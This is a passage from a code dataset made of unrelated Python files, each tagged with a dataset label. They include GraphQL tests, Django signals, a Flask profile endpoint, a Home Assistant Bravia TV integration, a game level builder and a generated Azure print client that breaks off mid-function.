globs = pyspark.ml.image.__dict__.copy()
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.image tests")\
.getOrCreate()
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(
pyspark.ml.image, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| StarcoderdataPython |
3490334 | from graphql.type import (
GraphQLField,
GraphQLFloat,
GraphQLInt,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLOutputType,
GraphQLSchema,
GraphQLString,
GraphQLUnionType,
)
from graphql.utilities import is_equal_type, is_type_sub_type_of
def describe_type_comparators():
def describe_is_equal_type():
def same_references_are_equal():
assert is_equal_type(GraphQLString, GraphQLString) is True
def int_and_float_are_not_equal():
assert is_equal_type(GraphQLInt, GraphQLFloat) is False
def lists_of_same_type_are_equal():
assert (
is_equal_type(GraphQLList(GraphQLInt), GraphQLList(GraphQLInt)) is True
)
def lists_is_not_equal_to_item():
assert is_equal_type(GraphQLList(GraphQLInt), GraphQLInt) is False
def nonnull_of_same_type_are_equal():
assert (
is_equal_type(GraphQLNonNull(GraphQLInt), GraphQLNonNull(GraphQLInt))
is True
)
def nonnull_is_not_equal_to_nullable():
assert is_equal_type(GraphQLNonNull(GraphQLInt), GraphQLInt) is False
def describe_is_type_sub_type_of():
def _test_schema(field_type: GraphQLOutputType = GraphQLString):
return GraphQLSchema(
query=GraphQLObjectType("Query", {"field": GraphQLField(field_type)})
)
def same_reference_is_subtype():
assert (
is_type_sub_type_of(_test_schema(), GraphQLString, GraphQLString)
is True
)
def int_is_not_subtype_of_float():
assert (
is_type_sub_type_of(_test_schema(), GraphQLInt, GraphQLFloat) is False
)
def non_null_is_subtype_of_nullable():
assert (
is_type_sub_type_of(
_test_schema(), GraphQLNonNull(GraphQLInt), GraphQLInt
)
is True
)
def nullable_is_not_subtype_of_non_null():
assert (
is_type_sub_type_of(
_test_schema(), GraphQLInt, GraphQLNonNull(GraphQLInt)
)
is False
)
def item_is_not_subtype_of_list():
assert not is_type_sub_type_of(
_test_schema(), GraphQLInt, GraphQLList(GraphQLInt)
)
def list_is_not_subtype_of_item():
assert not is_type_sub_type_of(
_test_schema(), GraphQLList(GraphQLInt), GraphQLInt
)
def member_is_subtype_of_union():
member = GraphQLObjectType("Object", {"field": GraphQLField(GraphQLString)})
union = GraphQLUnionType("Union", [member])
schema = _test_schema(union)
assert is_type_sub_type_of(schema, member, union)
def implementation_is_subtype_of_interface():
iface = GraphQLInterfaceType(
"Interface", {"field": GraphQLField(GraphQLString)}
)
impl = GraphQLObjectType(
"Object",
fields={"field": GraphQLField(GraphQLString)},
interfaces=[iface],
)
schema = _test_schema(impl)
assert is_type_sub_type_of(schema, impl, iface)
| StarcoderdataPython |
9766757 | import pandas as pd
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-i', '--input', required=True, nargs='+', type=str, dest="input")
parser.add_argument('-o', '--output', required=True, type=str, dest="output")
args = parser.parse_args()
df_list = [pd.read_csv(i).groupby(["title", "author", "pub_year"]).size().reset_index() for i in args.input]
df = pd.concat(df_list)
df = df.groupby(["title", "author", "pub_year"]).size().reset_index(name='counts')
df.sort_values(by=["counts", "pub_year"], inplace=True, ascending=False)
df.to_csv(args.output, index=False)
| StarcoderdataPython |
3221545 | from django.db.models import signals
from django.dispatch import receiver
from sales.models import ReceiptLine
# @receiver(signals.pre_delete,sender=ReceiptLine)
# def delete_status(sender,instance,*args,**kwargs):
# print ('deleting invoice status')
# inv=instance.invoice
# if inv.balance-instance.amount == 0 :
# inv.status = "Unpaid"
# elif inv.balance-instance.amount > 0:
# inv.status = "PartiallyPaid"
# else :
# inv.status = "Error"
# inv.save()
# print('updating receipt Amount')
# rec = instance.receipt
# rec.total -= instance.amount
# rec.save()
@receiver(signals.post_delete,sender=ReceiptLine)
def delete_status(sender,instance,*args,**kwargs):
print ('deleting invoice status')
inv=instance.invoice
print(f"in bal :{inv.get_balance()}")
if inv.get_balance() == inv.balance:
inv.status = "Unpaid"
else :
inv.status = "PartialPaid"
inv.save()
# print('updating receipt Amount')
# rec = instance.receipt
# rec.total -= instance.amount
# rec.save()
# these following lines must go since these eat up receipt amount on delete
# a=instance.receipt.total-instance.amount
# Receipt.objects.filter(id=instance.receipt.id).update(total=a)
# decoupling receipt allotment
# @receiver(signals.post_save,sender=Receipt)
# def allot_receipt(sender,instance=None,created=False,*args,**kwargs):
#
# if not instance:
# return
#
# if hasattr(instance, '_dirty'):
# return
#
# print(f"allotting receipt {instance.id} amount: {instance.total}")
# amount=instance.total
# invpaid = 0 if instance.get_line_totals() is None else instance.get_line_totals()
# print(f"invpaid{invpaid}")
# amount = amount - invpaid
# print(f"amount : {amount}")
# try:
# invtopay = Invoice.objects.filter(customer=instance.customer,balancetype=instance.type).exclude(status="Paid").order_by('created')
# except IndexError:
# invtopay = None
# print(invtopay)
# for i in invtopay:
# print(f"i:{i} bal:{i.get_balance()}")
# if amount<=0 : break
# bal=i.get_balance()
# if amount >= bal :
# amount -= bal
# ReceiptLine.objects.create(receipt=instance,invoice=i,amount=bal)
# i.status="Paid"
# else :
# ReceiptLine.objects.create(receipt=instance,invoice=i,amount=amount)
# i.status="PartiallyPaid"
# amount=0
# i.save()
# print('allotted receipt')
# try:
# instance._dirty = True
# instance.save()
# finally:
# del instance._dirty
# @receiver(signals.pre_delete,sender = InvoiceItem)
# def submit_stock(sender,instance,*args,**kwargs):
# if instance.invoice.posted:
# instance.unpost()
| StarcoderdataPython |
3541555 | <filename>Lib/site-packages/pyqt_units/MeasurementDatabase.py
#Created on 12 Aug 2014
#@author: neil.butcher
import os
from shutil import copyfile
root_filename = os.path.join(os.path.dirname(__file__) , 'measurements' ,'measurements_root.db')
filename = os.path.join(os.path.dirname(__file__) , 'measurements' , 'measurements_temp.db')
if not os.path.isfile(filename):
copyfile(root_filename,filename)
| StarcoderdataPython |
6489214 | from flask import jsonify
from flask_restful import Resource, request
from ..util.user import User
from ..util.dbutil import get_user,get_sensors,set_sensors,set_user
import json
class Profile(Resource):
def get(self):
#前端使用params传值
username = request.args.get("username")
print(str(username)+'查看个人页面')
user = get_user(username)
sensors = get_sensors(username)
data = {"name":{"information":"用户名:","content":user.username},\
"phone":{"information":"电话号码:","content":user.phonenum},\
"dorm":{"information":"宿舍楼:","content":user.dorm},\
"room":{"information":"寝室号:","content":user.room},\
"campus":{"information":"校区:","content":user.campus},\
"temp":{"information":"温度源:","content":sensors[0]},\
"humi":{"information":"湿度源:","content":sensors[1]},\
"video":{"information":"视频源:","content":user.rpiname}}
print(json.dumps(data))
#return json.dumps(data)
return jsonify(data)
def post(self):
data = request.get_json()
if data["username"]:
user = User()
user.username = data["username"]
user.phonenum = data["phonenum"]
user.dorm = data["dorm"]
user.room = data["room"]
user.campus = data["campus"]
user.rpiname = data["video"]
s_list=[data["temp"],data["humi"]]
if set_user(user):
if set_sensors(user.username,s_list):
return 1 #成功
return -1 #修改传感器失败
return -2 #修改用户失败
| StarcoderdataPython |
6447620 | # SPDX-FileCopyrightText: Copyright (c) 2022 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`circuitpython_typing`
================================================================================
Types needed for type annotation that are not in `typing`
* Author(s): <NAME>, <NAME>, <NAME>
"""
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Typing.git"
import array
from typing import Union, Optional
# Protocol was introduced in Python 3.8.
try:
from typing import Protocol # pylint: disable=ungrouped-imports
except ImportError:
from typing_extensions import Protocol
# Lists below are alphabetized.
# More added in each conditional import.
__all__ = [
"Alarm",
"AudioSample",
"ByteStream",
"FrameBuffer",
"ReadableBuffer",
"WriteableBuffer",
]
ReadableBuffer = Union[
array.array,
bytearray,
bytes,
memoryview,
"rgbmatrix.RGBMatrix",
"ulab.numpy.ndarray",
]
"""Classes that implement the readable buffer protocol."""
WriteableBuffer = Union[
array.array,
bytearray,
memoryview,
"rgbmatrix.RGBMatrix",
"ulab.numpy.ndarray",
]
"""Classes that implement the writeable buffer protocol."""
class ByteStream(Protocol):
"""Protocol for basic I/O operations on a byte stream.
Classes which implement this protocol include
* `io.BytesIO`
* `io.FileIO` (for a file open in binary mode)
* `busio.UART`
* `usb_cdc.Serial`
"""
# Should be `, /)`, but not available in Python 3.7.
def read(self, count: Optional[int] = None) -> Optional[bytes]:
"""Read ``count`` bytes from the stream.
If ``count`` bytes are not immediately available,
or if the parameter is not specified in the call,
the outcome is implementation-dependent.
"""
...
# Should be `, /)`, but not available in Python 3.7.
def write(self, buf: ReadableBuffer) -> Optional[int]:
"""Write the bytes in ``buf`` to the stream."""
...
# These types may not be in adafruit-blinka, so use the string form instead of a resolved name.
AudioSample = Union[
"audiocore.WaveFile",
"audiocore.RawSample",
"audiomixer.Mixer",
"audiomp3.MP3Decoder",
"synthio.MidiTrack",
]
"""Classes that implement the audiosample protocol.
You can play these back with `audioio.AudioOut`, `audiobusio.I2SOut` or `audiopwmio.PWMAudioOut`.
"""
FrameBuffer = Union["rgbmatrix.RGBMatrix"]
"""Classes that implement the framebuffer protocol."""
Alarm = Union["alarm.pin.PinAlarm", "alarm.time.TimeAlarm"]
"""Classes that implement alarms for sleeping and asynchronous notification.
You can use these alarms to wake up from light or deep sleep.
"""
| StarcoderdataPython |
1693630 | <reponame>frankmakesthecode/core
"""The Bravia TV component."""
import asyncio
from datetime import timedelta
import logging
from bravia_tv import BraviaRC
from bravia_tv.braviarc import NoIPControl
from homeassistant.components.media_player import DOMAIN as MEDIA_PLAYER_DOMAIN
from homeassistant.components.remote import DOMAIN as REMOTE_DOMAIN
from homeassistant.const import CONF_HOST, CONF_MAC, CONF_PIN
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CLIENTID_PREFIX, CONF_IGNORED_SOURCES, DOMAIN, NICKNAME
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [MEDIA_PLAYER_DOMAIN, REMOTE_DOMAIN]
SCAN_INTERVAL = timedelta(seconds=10)
async def async_setup_entry(hass, config_entry):
"""Set up a config entry."""
host = config_entry.data[CONF_HOST]
mac = config_entry.data[CONF_MAC]
pin = config_entry.data[CONF_PIN]
ignored_sources = config_entry.options.get(CONF_IGNORED_SOURCES, [])
coordinator = BraviaTVCoordinator(hass, host, mac, pin, ignored_sources)
config_entry.async_on_unload(config_entry.add_update_listener(update_listener))
await coordinator.async_config_entry_first_refresh()
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][config_entry.entry_id] = coordinator
hass.config_entries.async_setup_platforms(config_entry, PLATFORMS)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(
config_entry, PLATFORMS
)
if unload_ok:
hass.data[DOMAIN].pop(config_entry.entry_id)
return unload_ok
async def update_listener(hass, config_entry):
"""Handle options update."""
await hass.config_entries.async_reload(config_entry.entry_id)
class BraviaTVCoordinator(DataUpdateCoordinator[None]):
"""Representation of a Bravia TV Coordinator.
An instance is used per device to share the same power state between
several platforms.
"""
def __init__(self, hass, host, mac, pin, ignored_sources):
"""Initialize Bravia TV Client."""
self.braviarc = BraviaRC(host, mac)
self.pin = pin
self.ignored_sources = ignored_sources
self.muted = False
self.program_name = None
self.channel_name = None
self.channel_number = None
self.source = None
self.source_list = []
self.original_content_list = []
self.content_mapping = {}
self.duration = None
self.content_uri = None
self.start_date_time = None
self.program_media_type = None
self.audio_output = None
self.min_volume = None
self.max_volume = None
self.volume = None
self.is_on = False
# Assume that the TV is in Play mode
self.playing = True
self.state_lock = asyncio.Lock()
super().__init__(
hass,
_LOGGER,
name=DOMAIN,
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
hass, _LOGGER, cooldown=1.0, immediate=False
),
)
def _send_command(self, command, repeats=1):
"""Send a command to the TV."""
for _ in range(repeats):
for cmd in command:
self.braviarc.send_command(cmd)
def _get_source(self):
"""Return the name of the source."""
for key, value in self.content_mapping.items():
if value == self.content_uri:
return key
def _refresh_volume(self):
"""Refresh volume information."""
volume_info = self.braviarc.get_volume_info(self.audio_output)
if volume_info is not None:
self.audio_output = volume_info.get("target")
self.volume = volume_info.get("volume")
self.min_volume = volume_info.get("minVolume")
self.max_volume = volume_info.get("maxVolume")
self.muted = volume_info.get("mute")
return True
return False
def _refresh_channels(self):
"""Refresh source and channels list."""
if not self.source_list:
self.content_mapping = self.braviarc.load_source_list()
self.source_list = []
if not self.content_mapping:
return False
for key in self.content_mapping:
if key not in self.ignored_sources:
self.source_list.append(key)
return True
def _refresh_playing_info(self):
"""Refresh playing information."""
playing_info = self.braviarc.get_playing_info()
self.program_name = playing_info.get("programTitle")
self.channel_name = playing_info.get("title")
self.program_media_type = playing_info.get("programMediaType")
self.channel_number = playing_info.get("dispNum")
self.content_uri = playing_info.get("uri")
self.source = self._get_source()
self.duration = playing_info.get("durationSec")
self.start_date_time = playing_info.get("startDateTime")
if not playing_info:
self.channel_name = "App"
def _update_tv_data(self):
"""Connect and update TV info."""
power_status = self.braviarc.get_power_status()
if power_status != "off":
connected = self.braviarc.is_connected()
if not connected:
try:
connected = self.braviarc.connect(
self.pin, CLIENTID_PREFIX, NICKNAME
)
except NoIPControl:
_LOGGER.error("IP Control is disabled in the TV settings")
if not connected:
power_status = "off"
if power_status == "active":
self.is_on = True
if self._refresh_volume() and self._refresh_channels():
self._refresh_playing_info()
return
self.is_on = False
async def _async_update_data(self):
"""Fetch the latest data."""
if self.state_lock.locked():
return
await self.hass.async_add_executor_job(self._update_tv_data)
async def async_turn_on(self):
"""Turn the device on."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.turn_on)
await self.async_request_refresh()
async def async_turn_off(self):
"""Turn off device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.turn_off)
await self.async_request_refresh()
async def async_set_volume_level(self, volume):
"""Set volume level, range 0..1."""
async with self.state_lock:
await self.hass.async_add_executor_job(
self.braviarc.set_volume_level, volume, self.audio_output
)
await self.async_request_refresh()
async def async_volume_up(self):
"""Send volume up command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(
self.braviarc.volume_up, self.audio_output
)
await self.async_request_refresh()
async def async_volume_down(self):
"""Send volume down command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(
self.braviarc.volume_down, self.audio_output
)
await self.async_request_refresh()
async def async_volume_mute(self, mute):
"""Send mute command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.mute_volume, mute)
await self.async_request_refresh()
async def async_media_play(self):
"""Send play command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.media_play)
self.playing = True
await self.async_request_refresh()
async def async_media_pause(self):
"""Send pause command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.media_pause)
self.playing = False
await self.async_request_refresh()
async def async_media_stop(self):
"""Send stop command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.media_stop)
self.playing = False
await self.async_request_refresh()
async def async_media_next_track(self):
"""Send next track command."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.media_next_track)
await self.async_request_refresh()
async def async_media_previous_track(self):
"""Send previous track command."""
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.media_previous_track)
await self.async_request_refresh()
async def async_select_source(self, source):
"""Set the input source."""
if source in self.content_mapping:
uri = self.content_mapping[source]
async with self.state_lock:
await self.hass.async_add_executor_job(self.braviarc.play_content, uri)
await self.async_request_refresh()
async def async_send_command(self, command, repeats):
"""Send command to device."""
async with self.state_lock:
await self.hass.async_add_executor_job(self._send_command, command, repeats)
await self.async_request_refresh()
| StarcoderdataPython |
6475687 | import LevelBuilder
from sprites import *
"""
### Creating builder ###
level: lb = LevelBuilder.LevelBuilder("level_34.plist")
### Adding sprites ###
Hero: lb.addObject(Hero.HeroSprite(x=20,y=10))
Rotor: lb.addObject(Rotor.RotorSprite(x=180,y=110,speed=5,torque=10000))
Bucket: lb.addObject(EnemyBucketWithStar.EnemyBucketWithStarSprite(width=100,height=75, x=240, y=160, num_enemies=10, enemy_size=20))
Launcher: lb.addObject(Launcher.LauncherSprite(name='__launcher__1',x=260, y=50, trigger_x=400, trigger_y=100))
Beam: lb.addObject(Beam.BeamSprite(x=240+40,y=25,width=30,height=60,static='true',angle=0))
Nut: lb.addObject(Nut.NutSprite(x=50,y=200))
Enemy: lb.addObject(Enemy.EnemySprite(x=240,y=200,width=50,height=50))
Friend: lb.addObject(Friend.FriendSprite(x=240,y=125,width=128,height=128))
Wizard: lb.addObject(Wizard.WizardSprite(x=25,y=50))
Spikey: lb.addObject(SpikeyBuddy.SpikeyBuddySprite(x=50,y=80,width=50,height=50))
EnemyEquipedRotor: lb.addObject(EnemyEquipedRotor.EnemyEquipedRotorSprite(x=160,y=240,speed=2,torque=10000))
CyclingEnemyObject : CyclingEnemyObject.CyclingEnemyObjectSprite(name='num1',x=240,y=160,width=120,height=120,enemy_size=40)
### Custom names ###
Setting custom Name (for joints and Contact defs): Hero.HeroSprite(x=20,y=10).setName("piet")
### Adding Joints ###
RevJoint: revJoint = Joints.RevoluteJoint(body1='body_1',body2='body_2',motor_speed='50.0',torque='1000.0',enable_motor='true',lower_angle='12',upper_angle='45',enable_limit='false',collide_connected='false')
lb.addObject(revJoint)
PrismJoint: prismJoint = Joints.PrismaticJoint(body1='body_1',motor_speed='50.0',torque='1000.0',enable_motor='true',lower_translation='-100',upper_translation='100',enable_limit='false',vertical=False)
lb.addObject(prismJoint)
DistJoint: distJoint = Joints.DistanceJoint(body1='body_1',body2='body_2',damping='0.2',freq='0.8')
lb.addObject(distJoint)
### Adding Contacts ###
Contact: Contacts.Contact(body1='test',body2='test2',event_name='onTest')
lb.render()
"""
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Hero.HeroSprite(x=20,y=10))
lb.addObject(Friend.FriendSprite(x=213,y=320,width=15,height=15,static='true'))
lb.addObject(Star.StarSprite(x=213,y=300,width=32,height=32))
lb.addObject(Nut.NutSprite(x=15,y=160, eventName='onNutHitAll'))
lb.addObject(Nut.NutSprite(x=205,y=300, eventName='onNutHitAll'))
lb.addObject(Nut.NutSprite(x=225,y=300, eventName='onNutHitAll'))
lb.addObject(Nut.NutSprite(x=460,y=136, eventName='onNutHitAll'))
lb.addObject(Nut.NutSprite(x=240,y=30, eventName='onNutHitAll'))
for n in range(15):
lb.addObject(Nut.NutSprite(x=90 + (n*20),y=180, eventName='onNutHitAll'))
#2 main beams for holding back loads of enemies
lb.addObject(Beam.BeamSprite(x=104,y=245,width=250,height=20,static='false',angle=35))
lb.addObject(Beam.BeamSprite(x=350,y=240,width=310,height=20,static='false',angle=-35,density=1))
#several small beams
#lb.addObject(Beam.BeamSprite(x=50,y=45,width=50,height=20,static='true',angle=0))
#lb.addObject(Nut.NutSprite(x=50,y=70, eventName='onNutHitAll'))
#lb.addObject(Beam.BeamSprite(x=260,y=110,width=90,height=80,static='true',angle=0))
#lb.addObject(Nut.NutSprite(x=260,y=140, eventName='onNutHitAll'))
#lb.addObject(Beam.BeamSprite(x=140,y=150,width=190,height=20,static='true',angle=0))
#lb.addObject(Nut.NutSprite(x=90,y=180, eventName='onNutHitAll'))
#lb.addObject(Nut.NutSprite(x=170,y=180, eventName='onNutHitAll'))
#lb.addObject(Beam.BeamSprite(x=390,y=45,width=90,height=20,static='true',angle=0))
#lb.addObject(Nut.NutSprite(x=390,y=70, eventName='onNutHitAll'))
for i in range(15):
lb.addObject(Enemy.EnemySprite(x=40,y=300,width=32,height=32, density=2))
for i in range(10):
lb.addObject(Enemy.EnemySprite(x=380,y=290,width=32,height=32, density=2))
for i in range(13):
lb.addObject(Enemy.EnemySprite(x=430,y=300,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=240-20,y=200,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=240+20,y=200,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=240+80,y=200,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=240-60,y=200,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=240-120,y=200,width=32,height=32, density=2))
lb.addObject(Enemy.EnemySprite(x=390,y=64,width=128,height=128, density=2))
lb.addObject(SpikeyBuddy.SpikeyBuddySprite(x=320,y=20,width=40,height=40,density=6,restitution=0.6))
distJoint = Joints.DistanceJoint(body1='Star',body2='Friend',damping='0.2',freq='0.8')
lb.addObject(distJoint)
lb.render()
| StarcoderdataPython |
3375434 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PrintOperations(object):
"""PrintOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~devices_cloud_print.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_connectors(
self,
orderby=None, # type: Optional[List[Union[str, "models.Get5ItemsItem"]]]
select=None, # type: Optional[List[Union[str, "models.Get6ItemsItem"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrintConnector"]
"""Get connectors from print.
Get connectors from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Get5ItemsItem]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Get6ItemsItem]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrintConnector or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintConnector]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrintConnector"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_connectors.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrintConnector', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_connectors.metadata = {'url': '/print/connectors'} # type: ignore
def create_connectors(
self,
body, # type: "models.MicrosoftGraphPrintConnector"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintConnector"
"""Create new navigation property to connectors for print.
Create new navigation property to connectors for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintConnector, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintConnector"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_connectors.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintConnector')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintConnector', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_connectors.metadata = {'url': '/print/connectors'} # type: ignore
def get_connectors(
self,
print_connector_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum28"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintConnector"
"""Get connectors from print.
Get connectors from print.
:param print_connector_id: key: id of printConnector.
:type print_connector_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum28]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintConnector, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintConnector"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_connectors.metadata['url'] # type: ignore
path_format_arguments = {
'printConnector-id': self._serialize.url("print_connector_id", print_connector_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintConnector', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_connectors.metadata = {'url': '/print/connectors/{printConnector-id}'} # type: ignore
def update_connectors(
self,
print_connector_id, # type: str
body, # type: "models.MicrosoftGraphPrintConnector"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property connectors in print.
Update the navigation property connectors in print.
:param print_connector_id: key: id of printConnector.
:type print_connector_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintConnector
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_connectors.metadata['url'] # type: ignore
path_format_arguments = {
